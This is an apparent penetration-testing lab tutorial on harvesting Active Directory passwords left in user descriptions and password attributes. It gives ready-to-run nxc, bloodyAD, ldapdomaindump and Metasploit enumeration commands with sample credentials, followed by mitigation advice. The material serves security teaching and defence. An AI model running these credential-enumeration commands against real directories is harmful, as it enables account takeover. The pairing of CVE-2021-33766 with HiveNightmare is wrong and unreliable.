Credential Dumping: AD User Comment
In this article, we explore how attackers exploit AD user comments and attributes for password enumeration. This process helps attackers escalate their access within an organization by leveraging AD user comment password enumeration.
Active Directory (AD) and related services contain several critical vulnerabilities. These can expose password-related information stored in attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password. Attackers can exploit these flaws to access password hashes or even cleartext passwords. This significantly increases the risk of unauthorized access to systems and data. Key attack paths include privilege escalation, improper access control configurations and vulnerabilities in network protocols like SMB or RDP that enable attackers to intercept or access sensitive fields. Notable CVEs that enable such exploits include CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep), all of which if exploited, can lead to unauthorized access to critical password fields in AD.
Table of Contents
Understanding of Active Directory (AD) password attributes
Prerequisites
Lab Setup
Exploitation
- nxc
- bloodyAD
- ldapdomaindump
- MetaSploit
- Get-WmiObject
Mitigation
Understanding of Active Directory (AD) password attributes:
UserPassword: In Active Directory, the UserPassword field typically refers to the password hash stored for users (NTLM or sometimes Kerberos hashes). These hashes are used to authenticate users without directly storing plaintext passwords. If attackers access these hashes, they can perform offline attacks. These include brute force or dictionary attacks to recover original passwords.
UnixUserPassword: This field is used when integrating AD with Unix/Linux systems. Services like SSSD or nsswitch.conf
support such authentication. It stores the password hash for Unix-based systems, which is usually a different format (e.g., DES, SHA-512) than Windows hashes.
unicodePwd: The unicodePwd attribute in Active Directory holds the password for a user in Unicode format (UTF-16). This field is used by AD when passwords are being set or updated. In a typical AD deployment, this field would not be readable directly through normal LDAP queries due to security restrictions.
msSFU30Password: The msSFU30Password attribute is associated with the Microsoft Services for Unix (SFU) integration. This field stores passwords used in Unix environments but integrated into Active Directory, similar to the unixUserPassword attribute. If a system uses SFU, this field will store the password hash in a Unix-compatible format.
Prerequisites
- Windows Server 2019 as Active Directory Domain Controller
- Tools: nxc, bloodyAD, ldapdomaindump, MetaSploit, Get-WmiObject utility
- Kali Linux
- Windows 10/11 – As Client/Attaker Machine
Lab Setup
In this lab set up, we will create an AD user, then add user description that contains user’s password and provide passwords in “userPassword” & “userUnixPassword” attributes.
Create the AD Environment
To simulate an Active Directory environment, set up a Windows Server 2019 as a Domain Controller (DC). You will also need a client/attacker machine (Windows or Linux) to run enumeration and exploitation tools.
Domain Controller
Install Windows Server (2016 or 2019 recommended).
- Promote it to a Domain Controller by adding the “Active Directory Domain Services” role.
- Set up the domain (e.g., “local”).
- Next, create a domain user with username “raj” and password “Password@1”.
Create an AD user and provide user description
Once the AD environment is set up, open PowerShell in Administrative mode on the Windows Server. Then, run the two commands below. These commands will create the user “divya” with the “description” attribute containing the password.
Import-module ActiveDirectory Set-ADUser –Identity “divya” –Description “this is a default password =Password@123”
Using “Get-ADUser” utility and a command like below, we can confirm that a user with “divya” as username has been created along with the description provided.
Get-ADUser -Identity "divya" -Properties Description | Select-Object Name, Description
Then navigate to “divya” user’s properties window by following the below steps.
Steps
- Open “Active Directory Users and Computers (ADUC)” on the Domain Controller.
- Enable the “Advanced Features” view by clicking on “View > Advanced Features”.
- Locate user “divya” in the “Users” container.
- Right-click on “divya” user and go to “Properties”.
This action opens “General” tab of “divya” user’s Properties window, wherein the “Description” added can be viewed/confirmed.
Update userPassword attribute:
Navigate to “Attribute Editor” tab within “divya” user’s properties window, select “userPassword” attribute and click on “Edit” button. This action opens “Multi-valued Octet String Editor” pop-up window. Click on “Add” button in the new window opened.
Then, provide “divya” user’s password “Password@123” in it’s Hexadecimal form within “Value” textarea and click on “OK” button in the “Octet String Attribute Editor” pop-up window.
Update userUnixPassword attribute:
Similar to the steps mentioned above in “Update userPassword attribute” section, one can select “userUnixPassword” attribute and update it’s value to “admin@123”.
Select “userUnixPassword” attribute and click on “Edit” button. This action opens “Multi-valued Octet String Editor” pop-up window. Click on “Add” button in the new window opened.
Provide “divya” user’s Unix Password “admin@123” in it’s Hexadecimal form within “Value” textarea and click on “OK” button in the “Octet String Attribute Editor” pop-up window.
Alternatively, one can run below command from the PowerShell window that’s opened in “Create an AD user and provide user description” section to update “divya” user’s Unix Password as “admin@123”.
Set-ADUser -Identity "divya" -Replace @{ uidNumber=1001; gidNumber=1001; unixHomeDirectory="/home/linux"; loginShell="/bin/bash"; unixUserPassword="admin@123" }
Exploitation
nxc
Run the below command from Kali Linux Root Terminal to Get user descriptions stored in Active Directory using “user-desc” module of “nxc” tool.
nxc ldap 192.168.1.48 -u raj -p Password@1 -M user-desc
Next, access “nxc” tool logs using the below command to revisit the enumerated information at a later time.
cat /root/.nxc/logs/UserDesc-192.168.1.48-20250120_052352.log
In addition, run the following commands to enumerate sensitive information such as passwords.
- Enumerate AD users’ descriptions, using the module “get-desc-users”, which at times may contain passwords.
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-desc-users
- Enumerate userPassword attribute, using the module “get-userPassword”, from all users in ldap.
nxc ldap 192.168.1.48 -u raj -p Password@1 -M get-userPassword
- Enumerate unixUserPassword attribute, using the module “get-unixUserPassword”, from all users in ldap.
nxc ldap ignite.local -u raj -p Password@1 -M get-unixUserPassword
bloodyAD
Run the below command to enumerate all users’ sensitive information that is stored in “userPassword”, “unixUserPassword”, “unicodePassword” and “description” objectClasses.
bloodyAD -u raj -p 'Password@1' -d ignite.local --host 192.168.1.48 get search --filter '(|(userPassword=*)(unixUserPassword=*)(unicodePassword=*)(description=*))' --attr userPassword,unixUserPassword,unicodePwd,description
Furthermore, you can observe output containing sensitive information like passwords and attacks a user is vulnerable to.
ldapdomaindump
Run below commands to enumerate complete information about the AD under testing, then navigate to “AD_DUMP” directory and list all the files generated upon running “ldapdomaindump” tool.
ldapdomaindump -u 'ignite.local\raj' -p Password@1 192.168.1.48 -o AD_DUMP cd AD_DUMP ls -al
Now, access “domain_users.html” file using a browser. Observe that the attacker could enumerate AD users’ “description” attribute that gives away user’s password or the attack technique to which the user is vulnerable to.
MetaSploit
Run MetaSploit Framework Console from Kali Linux Root Terminal using the below command.
Use “ldap_query” auxiliary module, set all required options and run the module to enumerate all AD users’ information.
use auxiliary/gather/ldap_query set action ENUM_ACCOUNTS set rhosts 192.168.1.48 set username raj set password Password@1 set domain ignite.local run
Below output screenshot lists AD users’ information along with their corresponding information stored in AD “description” attribute.
Note: Alternatively, we may use “enum_ad_user_comments” module and enumerate user’s information along with the information stored in AD “descsription” attribute. Below is the list of commands to execute in sequence and the output screenshot upon running listed commands from Kali Linux Root Terminal.
use post/windows/gather/enum_ad_user_comments set session 1 run
Get-WmiObject
Open PowerShell in Administrative Mode in a Windows Client/Attacker Machine. Then, run the below command to enumerate information like “username”, “SID” and “description” of users’ listed in the command using the “Get-WmiObject” utility.
Get-WmiObject -Class Win32_UserAccount | Where-Object { $_.Name -in @("raj", "divya") } | Select-Object Name, SID, Domain, Description
Mitigation
Vulnerabilities like CVE-2020-1472 (Zerologon), CVE-2017-0144 (EternalBlue), CVE-2021-33766 (HiveNightmare), and CVE-2019-0708 (BlueKeep) highlight potential risks. However, the UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password attributes may not always present a direct threat. These attributes are vulnerable under specific conditions
However, attackers can use various attack vectors to gain the necessary access to retrieve these password-related fields from Active Directory configuration.
Below are the best practices to follow diligently to remediate and resolve the possibility of enumerating AD users’ passwords:
Use Strong Encryption: Ensure that all communications between clients and domain controllers remain encrypted (LDAPS, SMB encryption, etc.) to prevent attackers from intercepting password hashes. Also, disable legacy authentication protocols such as NTLM where possible.
Limit Access to Password Attributes: Use stringent Access Control Lists (ACLs) to restrict access to sensitive attributes like UserPassword, UnixUserPassword, unicodePwd, and msSFU30Password to only trusted & limited number of administrators.
Regularly Audit AD Permissions: Regularly review and audit the permissions on AD objects to ensure that only authorized users and groups can access sensitive fields.
Apply Security Patches: Ensure all AD and associated systems (like Unix integrations) are regularly patched to prevent exploitation of known vulnerabilities.
Monitor for Privilege Escalation: Use monitoring & alerting tools and practices to detect suspicious activities such as privilege escalation, lateral movement and/or attempts to dump credentials.
Author: Srikrishna is a Cybersecurity leader driving security excellence and mentoring teams to enhance security across products, networks, and organizations.. Contact Here